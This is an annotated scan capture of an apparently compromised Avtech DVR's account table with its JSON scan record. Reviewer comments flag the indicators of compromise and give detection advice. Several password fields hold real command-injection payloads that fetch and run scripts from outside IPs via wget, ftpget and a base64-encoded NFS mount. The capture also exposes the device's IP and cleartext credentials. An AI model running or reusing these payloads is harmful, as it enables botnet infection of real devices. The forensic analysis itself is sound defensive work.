HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:57:52 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Thu, 07 Nov 2024 00:24:03 GMT
Content-Type: text/plain
ETag: 5125-10218-1730939043
Content-Length: 10218
<Account>
<!-- Device-wide account settings as returned in this capture.
     NOTE(review): LocalPassword and OperatorPassword both hold the four-digit value 0000 and are
     served in cleartext (Content-Type text/plain; the scan record below reports tls false).
     Whether 0000 is a factory default is not visible here.
     The meaning of the Level="40/40" attribute and of AccountSecure 0 cannot be determined from
     this dump; confirm against vendor documentation before drawing conclusions from them. -->
<Maxuser Level="40/40">20</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<AccountSecure Level="40/40">0</AccountSecure>
<!-- Permission model: Define names each PermitN capability, and Group1 to Group4 assign values
     to those permits per role.
     Triage relevance: every User entry in this capture has Level SUPERVISOR, and Group1
     (SUPERVISOR) holds YES on every switch permit, including ConfigSetup (Permit11), Reboot
     (Permit12), LogClean (Permit14), CleanHDD (Permit15) and AccountSetup (Permit17). -->
<Permission>
<LastGroup>SUPERVISOR</LastGroup>
<MaxPermDefNum>20</MaxPermDefNum>
<!-- Permit definitions. Per the Value attributes, Type Channel takes a channel list and Type
     Switch takes YES or NO. Permit16 is not defined in this dump (numbering goes 15, 17). -->
<Define>
<Permit1 Type="Channel" Value="0,1,2..16">LiveVideo</Permit1>
<Permit2 Type="Channel" Value="0,1,2..16">LiveAudio</Permit2>
<Permit3 Type="Channel" Value="0,1,2..16">PlaybackVideo</Permit3>
<Permit4 Type="Channel" Value="0,1,2..16">PlaybackAudio</Permit4>
<Permit5 Type="Channel" Value="0,1,2..16">LiveVideoStream</Permit5>
<Permit6 Type="Channel" Value="0,1,2..16">LiveAudioStream</Permit6>
<Permit7 Type="Channel" Value="0,1,2..16">PlaybackVideoStream</Permit7>
<Permit8 Type="Channel" Value="0,1,2..16">PlaybackAudioStream</Permit8>
<Permit9 Type="Channel" Value="0,1,2..16">Backup</Permit9>
<Permit10 Type="Switch" Value="YES/NO">PtzControl</Permit10>
<Permit11 Type="Switch" Value="YES/NO">ConfigSetup</Permit11>
<Permit12 Type="Switch" Value="YES/NO">Reboot</Permit12>
<Permit13 Type="Switch" Value="YES/NO">LogReview</Permit13>
<Permit14 Type="Switch" Value="YES/NO">LogClean</Permit14>
<Permit15 Type="Switch" Value="YES/NO">CleanHDD</Permit15>
<Permit17 Type="Switch" Value="YES/NO">AccountSetup</Permit17>
<Permit18 Type="Switch" Value="YES/NO">PushVideo</Permit18>
<Permit19 Type="Switch" Value="YES/NO">PushStatus</Permit19>
<Permit20 Type="Switch" Value="YES/NO">AlarmOut</Permit20>
</Define>
<MaxGroupNum>40</MaxGroupNum>
<!-- SUPERVISOR: all channel permits populated and every switch permit set to YES.
     Permit5 is the only list here that also includes channel 0. -->
<Group1>
<Name>SUPERVISOR</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>
<Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>
<Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>
<Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>
<Permit10>YES</Permit10>
<Permit11>YES</Permit11>
<Permit12>YES</Permit12>
<Permit13>YES</Permit13>
<Permit14>YES</Permit14>
<Permit15>YES</Permit15>
<Permit17>YES</Permit17>
<Permit18>YES</Permit18>
<Permit19>YES</Permit19>
<Permit20>YES</Permit20>
</Group1>
<!-- POWER USER: same channel permits as SUPERVISOR; only PtzControl (Permit10) and AlarmOut
     (Permit20) are YES among the switches. -->
<Group2>
<Name>POWER USER</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>
<Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>
<Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>
<Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>
<Permit10>YES</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>NO</Permit20>
</Group2>
<!-- USER: live permits populated, playback and backup permits hold -1, all switches NO.
     NOTE(review): -1 presumably means "no channels"; confirm against vendor documentation. -->
<Group3>
<Name>USER</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>-1</Permit3>
<Permit4>-1</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>-1</Permit7>
<Permit8>-1</Permit8>
<Permit9>-1</Permit9>
<Permit10>NO</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>NO</Permit20>
</Group3>
<!-- GUEST: only LiveVideo (Permit1) and LiveVideoStream (Permit5) are populated; every other
     channel permit holds -1 and all switches are NO. -->
<Group4>
<Name>GUEST</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>-1</Permit2>
<Permit3>-1</Permit3>
<Permit4>-1</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>-1</Permit6>
<Permit7>-1</Permit7>
<Permit8>-1</Permit8>
<Permit9>-1</Permit9>
<Permit10>NO</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>NO</Permit20>
</Group4>
</Permission>
<!-- Maps permits to CGI endpoints. Each Rn names one RelatedPermit and one or more Cn entries;
     a Cn gives a CGI name (CMD) and, optionally, a parameter value (P1).
     NOTE(review): the element name suggests that requests to a listed CGI are denied when the
     caller's group lacks the related permit; the enforcement logic is not visible in this dump.
     For log review on a device showing injected User entries: Permit17 (AccountSetup) is tied to
     PwdGrp.cgi, and Permit11 (ConfigSetup) to Config.cgi, DVR.cgi with P1 set, and Firmware.cgi.
     Presumably requests to those endpoints are where account and configuration changes would
     show up in the web-server log; confirm against the firmware. -->
<CGIPermitDenyFilter>
<!-- R1, R2: playback stream permits (Permit7, Permit8) share the same two CGIs. -->
<R1>
<RelatedPermit>Permit7</RelatedPermit>
<C1>
<CMD>NetworkBk.cgi</CMD>
</C1>
<C2>
<CMD>DownloadCtrl.cgi</CMD>
</C2>
</R1>
<R2>
<RelatedPermit>Permit8</RelatedPermit>
<C1>
<CMD>NetworkBk.cgi</CMD>
</C1>
<C2>
<CMD>DownloadCtrl.cgi</CMD>
</C2>
</R2>
<!-- R3: PtzControl (Permit10). -->
<R3>
<RelatedPermit>Permit10</RelatedPermit>
<C1>
<CMD>Serial.cgi</CMD>
</C1>
</R3>
<!-- R4: Reboot (Permit12), scoped to Factory.cgi with parameter reboot. -->
<R4>
<RelatedPermit>Permit12</RelatedPermit>
<C1>
<CMD>Factory.cgi</CMD>
<P1>reboot</P1>
</C1>
</R4>
<!-- R5, R6: LogReview (Permit13) covers Log.cgi as a whole; LogClean (Permit14) covers Log.cgi
     with parameter clean. Log clearing matters for forensics: a SUPERVISOR account holds it. -->
<R5>
<RelatedPermit>Permit13</RelatedPermit>
<C1>
<CMD>Log.cgi</CMD>
</C1>
</R5>
<R6>
<RelatedPermit>Permit14</RelatedPermit>
<C1>
<CMD>Log.cgi</CMD>
<P1>clean</P1>
</C1>
</R6>
<!-- R7: CleanHDD (Permit15), scoped to Factory.cgi with parameter clean_hdd_yes. -->
<R7>
<RelatedPermit>Permit15</RelatedPermit>
<C1>
<CMD>Factory.cgi</CMD>
<P1>clean_hdd_yes</P1>
</C1>
</R7>
<!-- R8: AccountSetup (Permit17). -->
<R8>
<RelatedPermit>Permit17</RelatedPermit>
<C1>
<CMD>PwdGrp.cgi</CMD>
</C1>
</R8>
<!-- R9, R10: push notification permits (Permit18, Permit19). -->
<R9>
<RelatedPermit>Permit18</RelatedPermit>
<C1>
<CMD>Notify.cgi</CMD>
</C1>
<C2>
<CMD>Config.cgi</CMD>
<P1>Notification.Guard</P1>
</C2>
</R9>
<R10>
<RelatedPermit>Permit19</RelatedPermit>
<C1>
<CMD>Notify.cgi</CMD>
<P1>SystemAlert</P1>
</C1>
<C2>
<CMD>Config.cgi</CMD>
<P1>Notification.Log.Push.Action</P1>
</C2>
</R10>
<!-- R11: ConfigSetup (Permit11) covers configuration, DVR set operations and firmware. -->
<R11>
<RelatedPermit>Permit11</RelatedPermit>
<C1>
<CMD>Config.cgi</CMD>
</C1>
<C2>
<CMD>DVR.cgi</CMD>
<P1>set</P1>
</C2>
<C3>
<CMD>Firmware.cgi</CMD>
</C3>
</R11>
<!-- R12: AlarmOut (Permit20). -->
<R12>
<RelatedPermit>Permit20</RelatedPermit>
<C1>
<CMD>IO.cgi</CMD>
</C1>
</R12>
</CGIPermitDenyFilter>
<!-- NOTE(review): indicator of compromise. The admin account (Level SUPERVISOR, Lifetime
     INFINITE) carries a password string that reads as a botnet marker rather than an
     operator-chosen secret. Presumably it was changed by the same party that added the injected
     User entries in this file; confirm from device logs where available.
     For response: treat the admin credential as attacker-known and the device as untrusted until
     it has been reflashed and the account table rebuilt.
     The element name NeddRemove is spelled as the device emits it; its meaning is not visible. -->
<User1>
<Username>admin</Username>
<Password>murdoc_botnet</Password>
<Level>SUPERVISOR</Level>
<Lifetime>INFINITE</Lifetime>
<NeddRemove>YES</NeddRemove>
</User1>
<!-- Cloud setting as reported by the device.
     NOTE(review): what DefaultSync controls is not visible in this capture. -->
<Cloud>
<DefaultSync>YES</DefaultSync>
</Cloud>
<!-- NOTE(review): indicator of compromise, not a real account. The Password value is a shell
     command substitution: it removes av.sh in /tmp, then retrieves a script over plain HTTP from
     45.14.224.153 with busybox wget and pipes it to sh.
     It has an effect only if the firmware passes this field to a shell unescaped. The presence
     of this entry suggests that was the intent, but the vulnerable code path is not shown here.
     Level SUPERVISOR with Lifetime INFINITE presumably keeps the entry, and so the payload, in
     the stored account table; confirm against the firmware.
     Detection: password fields containing shell metacharacters such as dollar-parenthesis,
     semicolon or pipe; outbound HTTP from a DVR or camera to the address above. -->
<User2>
<Username Level="40/40" Dispatch="account">test</Username>
<Password Level="40/40" Dispatch="account">$(cd /tmp; rm -rf av.sh; /bin/busybox wget http://45.14.224.153/wget.sh -O- | sh)</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<!-- NOTE(review): indicator of compromise. The Password value is a shell command substitution
     that base64-decodes an embedded string and pipes the result to sh. Decoded, the string
     mounts an NFS export from 89.190.156.30 under /tmp with exec enabled and runs a script named
     av.sh from that mount.
     Gap in the scan record: app.extract.ip in the JSON below lists only 45.14.224.153 and
     103.124.107.17, so the NFS host is missed by extraction that does not decode base64. Add it
     to blocklists and hunts by hand.
     Detection: outbound NFS (TCP 2049 and portmapper) from a DVR or camera is unusual and worth
     alerting on; so is any base64 blob inside an account field.
     This entry appears between User2 and User3 in the dump, out of numeric order; the significance
     of that ordering is not visible here. -->
<User5>
<Username Level="40/40" Dispatch="account">0gpnCaSS3ZODCs</Username>
<Password Level="40/40" Dispatch="account">$(echo -ne Y2QgL3RtcDsgbWtkaXIgdGU7IG1vdW50IC1vIGludHIsbm9sb2NrLHRjcCxleGVjIDg5LjE5MC4xNTYuMzA6L3Nydi9uZnMgdGU7IHNoIHRlL2F2LnNo | base64 -d | sh)</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User5>
<!-- NOTE(review): indicator of compromise. The Password value wraps a shell command substitution
     in semicolons; it removes dav.sh in /tmp, retrieves a file of that name from 103.124.107.17
     with ftpget, and runs it with sh.
     The random-looking username and the Lifetime of 5 MIN differ from the INFINITE entries in
     this file. Presumably this is a short-lived account created by an automated run, possibly by
     a different actor than the wget and NFS entries; that attribution is an inference, not
     something this capture proves.
     Detection: outbound FTP from a DVR or camera to the address above; a dav.sh file in /tmp. -->
<User3>
<Username Level="40/40" Dispatch="account">dd7rD</Username>
<Password Level="40/40" Dispatch="account">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User3>
<!-- NOTE(review): indicator of compromise. The Password value is byte-for-byte the same ftpget
     payload as in the User3 entry (host 103.124.107.17, file dav.sh), under a different
     random-looking username and with the same 5 MIN Lifetime.
     Two identical payloads under distinct names suggest repeated automated attempts against this
     device; the count of such entries is a rough measure of how often it has been hit.
     For response: removing the entries alone does not undo whatever the scripts did. Treat the
     device as compromised, reflash it, and restrict its management interface from the internet. -->
<User4>
<Username Level="40/40" Dispatch="account">f2hj6</Username>
<Password Level="40/40" Dispatch="account">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
</Account>
{
"@category" : "datascan",
"@timestamp" : "2024-11-06T21:57:52.000Z",
"app" : {
"extract" : {
"file" : [
"av.sh",
"dav.sh"
],
"ip" : [
"45.14.224.153",
"103.124.107.17"
],
"url" : [
"http://45.14.224.153/wget.sh"
]
},
"http" : {
"bodymd5" : "2e6c88ff01ba06d04ed782798822baad",
"bodymmh3" : 1091070242,
"header" : [
{
"value" : "Thu, 07 Nov 2024 00:24:03 GMT",
"name" : "Last-Modified"
},
{
"value" : "5125-10218-1730939043",
"name" : "ETag"
}
],
"headermd5" : "55e152df5ae000f4cd5f1e6df1ede339",
"headermmh3" : -1877788544
},
"length" : 10456
},
"asn" : "AS4788",
"city" : "Kuala Lumpur",
"country" : "MY",
"cpe" : "<enterprise field>: cpe",
"cpecount" : "<enterprise field>: cpecount",
"data" : "HTTP/1.1 200 OK\r\nDate: Thu, 07 Nov 2024 05:57:52 GMT\r\nServer: Linux/2.x UPnP/1.0 Avtech/1.0\r\nConnection: close\r\nLast-Modified: Thu, 07 Nov 2024 00:24:03 GMT\r\nContent-Type: text/plain\r\nETag: 5125-10218-1730939043\r\nContent-Length: 10218\r\n\r\n<Account>\n <Maxuser Level=\"40/40\">20</Maxuser>\n <LocalPassword Level=\"40/40\">0000</LocalPassword>\n <OperatorPassword Level=\"40/40\">0000</OperatorPassword>\n <AnonymousLogin Level=\"40/40\" Dispatch=\"account\">DISABLE</AnonymousLogin>\n <AdvenceUserLevel Level=\"40/40\">OFF</AdvenceUserLevel>\n <AccountSecure Level=\"40/40\">0</AccountSecure>\n <Permission>\n <LastGroup>SUPERVISOR</LastGroup>\n <MaxPermDefNum>20</MaxPermDefNum>\n <Define>\n <Permit1 Type=\"Channel\" Value=\"0,1,2..16\">LiveVideo</Permit1>\n <Permit2 Type=\"Channel\" Value=\"0,1,2..16\">LiveAudio</Permit2>\n <Permit3 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackVideo</Permit3>\n <Permit4 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackAudio</Permit4>\n <Permit5 Type=\"Channel\" Value=\"0,1,2..16\">LiveVideoStream</Permit5>\n <Permit6 Type=\"Channel\" Value=\"0,1,2..16\">LiveAudioStream</Permit6>\n <Permit7 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackVideoStream</Permit7>\n <Permit8 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackAudioStream</Permit8>\n <Permit9 Type=\"Channel\" Value=\"0,1,2..16\">Backup</Permit9>\n <Permit10 Type=\"Switch\" Value=\"YES/NO\">PtzControl</Permit10>\n <Permit11 Type=\"Switch\" Value=\"YES/NO\">ConfigSetup</Permit11>\n <Permit12 Type=\"Switch\" Value=\"YES/NO\">Reboot</Permit12>\n <Permit13 Type=\"Switch\" Value=\"YES/NO\">LogReview</Permit13>\n <Permit14 Type=\"Switch\" Value=\"YES/NO\">LogClean</Permit14>\n <Permit15 Type=\"Switch\" Value=\"YES/NO\">CleanHDD</Permit15>\n <Permit17 Type=\"Switch\" Value=\"YES/NO\">AccountSetup</Permit17>\n <Permit18 Type=\"Switch\" Value=\"YES/NO\">PushVideo</Permit18>\n <Permit19 Type=\"Switch\" Value=\"YES/NO\">PushStatus</Permit19>\n <Permit20 Type=\"Switch\" 
Value=\"YES/NO\">AlarmOut</Permit20>\n </Define>\n <MaxGroupNum>40</MaxGroupNum>\n <Group1>\n <Name>SUPERVISOR</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>\n <Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>\n <Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>\n <Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>\n <Permit10>YES</Permit10>\n <Permit11>YES</Permit11>\n <Permit12>YES</Permit12>\n <Permit13>YES</Permit13>\n <Permit14>YES</Permit14>\n <Permit15>YES</Permit15>\n <Permit17>YES</Permit17>\n <Permit18>YES</Permit18>\n <Permit19>YES</Permit19>\n <Permit20>YES</Permit20>\n </Group1>\n <Group2>\n <Name>POWER USER</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>\n <Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>\n <Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>\n <Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>\n <Permit10>YES</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>YES</Permit20>\n </Group2>\n <Group3>\n <Name>USER</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>-1</Permit3>\n <Permit4>-1</Permit4>\n 
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>-1</Permit7>\n <Permit8>-1</Permit8>\n <Permit9>-1</Permit9>\n <Permit10>NO</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>NO</Permit20>\n </Group3>\n <Group4>\n <Name>GUEST</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>-1</Permit2>\n <Permit3>-1</Permit3>\n <Permit4>-1</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>-1</Permit6>\n <Permit7>-1</Permit7>\n <Permit8>-1</Permit8>\n <Permit9>-1</Permit9>\n <Permit10>NO</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>NO</Permit20>\n </Group4>\n </Permission>\n <CGIPermitDenyFilter>\n <R1>\n <RelatedPermit>Permit7</RelatedPermit>\n <C1>\n <CMD>NetworkBk.cgi</CMD>\n </C1>\n <C2>\n <CMD>DownloadCtrl.cgi</CMD>\n </C2>\n </R1>\n <R2>\n <RelatedPermit>Permit8</RelatedPermit>\n <C1>\n <CMD>NetworkBk.cgi</CMD>\n </C1>\n <C2>\n <CMD>DownloadCtrl.cgi</CMD>\n </C2>\n </R2>\n <R3>\n <RelatedPermit>Permit10</RelatedPermit>\n <C1>\n <CMD>Serial.cgi</CMD>\n </C1>\n </R3>\n <R4>\n <RelatedPermit>Permit12</RelatedPermit>\n <C1>\n <CMD>Factory.cgi</CMD>\n <P1>reboot</P1>\n </C1>\n </R4>\n <R5>\n <RelatedPermit>Permit13</RelatedPermit>\n <C1>\n <CMD>Log.cgi</CMD>\n </C1>\n </R5>\n <R6>\n <RelatedPermit>Permit14</RelatedPermit>\n <C1>\n <CMD>Log.cgi</CMD>\n <P1>clean</P1>\n </C1>\n </R6>\n <R7>\n <RelatedPermit>Permit15</RelatedPermit>\n <C1>\n <CMD>Factory.cgi</CMD>\n <P1>clean_hdd_yes</P1>\n </C1>\n </R7>\n <R8>\n <RelatedPermit>Permit17</RelatedPermit>\n <C1>\n 
<CMD>PwdGrp.cgi</CMD>\n </C1>\n </R8>\n <R9>\n <RelatedPermit>Permit18</RelatedPermit>\n <C1>\n <CMD>Notify.cgi</CMD>\n </C1>\n <C2>\n <CMD>Config.cgi</CMD>\n <P1>Notification.Guard</P1>\n </C2>\n </R9>\n <R10>\n <RelatedPermit>Permit19</RelatedPermit>\n <C1>\n <CMD>Notify.cgi</CMD>\n <P1>SystemAlert</P1>\n </C1>\n <C2>\n <CMD>Config.cgi</CMD>\n <P1>Notification.Log.Push.Action</P1>\n </C2>\n </R10>\n <R11>\n <RelatedPermit>Permit11</RelatedPermit>\n <C1>\n <CMD>Config.cgi</CMD>\n </C1>\n <C2>\n <CMD>DVR.cgi</CMD>\n <P1>set</P1>\n </C2>\n <C3>\n <CMD>Firmware.cgi</CMD>\n </C3>\n </R11>\n <R12>\n <RelatedPermit>Permit20</RelatedPermit>\n <C1>\n <CMD>IO.cgi</CMD>\n </C1>\n </R12>\n </CGIPermitDenyFilter>\n <User1>\n <Username>admin</Username>\n <Password>murdoc_botnet</Password>\n <Level>SUPERVISOR</Level>\n <Lifetime>INFINITE</Lifetime>\n <NeddRemove>YES</NeddRemove>\n </User1>\n <Cloud>\n <DefaultSync>YES</DefaultSync>\n </Cloud>\n <User2>\n <Username Level=\"40/40\" Dispatch=\"account\">test</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">$(cd /tmp; rm -rf av.sh; /bin/busybox wget http://45.14.224.153/wget.sh -O- | sh)</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">INFINITE</Lifetime>\n </User2>\n <User5>\n <Username Level=\"40/40\" Dispatch=\"account\">0gpnCaSS3ZODCs</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">$(echo -ne Y2QgL3RtcDsgbWtkaXIgdGU7IG1vdW50IC1vIGludHIsbm9sb2NrLHRjcCxleGVjIDg5LjE5MC4xNTYuMzA6L3Nydi9uZnMgdGU7IHNoIHRlL2F2LnNo | base64 -d | sh)</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">INFINITE</Lifetime>\n </User5>\n <User3>\n <Username Level=\"40/40\" Dispatch=\"account\">dd7rD</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>\n <Level Level=\"40/40\" 
Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">5 MIN</Lifetime>\n </User3>\n <User4>\n <Username Level=\"40/40\" Dispatch=\"account\">f2hj6</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">5 MIN</Lifetime>\n </User4>\n</Account>\n",
"datamd5" : "57039e9d9f5b32cc87dc2f7387d9b7e9",
"datammh3" : -1051983284,
"device" : {
"class" : "<enterprise field>: device.class"
},
"geolocus" : {
"asn" : "AS4788",
"continent" : "AS",
"continentname" : "Asia",
"country" : "MY",
"countryname" : "Malaysia",
"domain" : [
"tm.com.my"
],
"isineu" : "false",
"latitude" : "4.210484",
"location" : "4.210484,101.975766",
"longitude" : "101.975766",
"netname" : "ADSL-STREAMYX",
"organization" : "Telekom Malaysia Berhad",
"subnet" : "115.135.0.0/16"
},
"ip" : "115.135.192.196",
"ipv6" : "false",
"latitude" : "3.1412",
"location" : "3.1412,101.6850",
"longitude" : "101.6850",
"node" : {
"country" : "<enterprise field>: node.country",
"groupid" : "<enterprise field>: node.groupid",
"id" : "<enterprise field>: node.id",
"physicalcountry" : "<enterprise field>: node.physicalcountry"
},
"organization" : "TM TECHNOLOGY SERVICES SDN. BHD.",
"os" : "Linux",
"osvendor" : "Linux",
"osversion" : "2",
"port" : 548,
"protocol" : "http",
"protocolversion" : "1.1",
"reason" : "OK",
"seen_date" : "2024-11-06",
"source" : "datascan",
"status" : 200,
"subnet" : "115.132.0.0/14",
"tag" : "<enterprise field>: tag",
"tls" : "false",
"transport" : "tcp",
"url" : "/"
}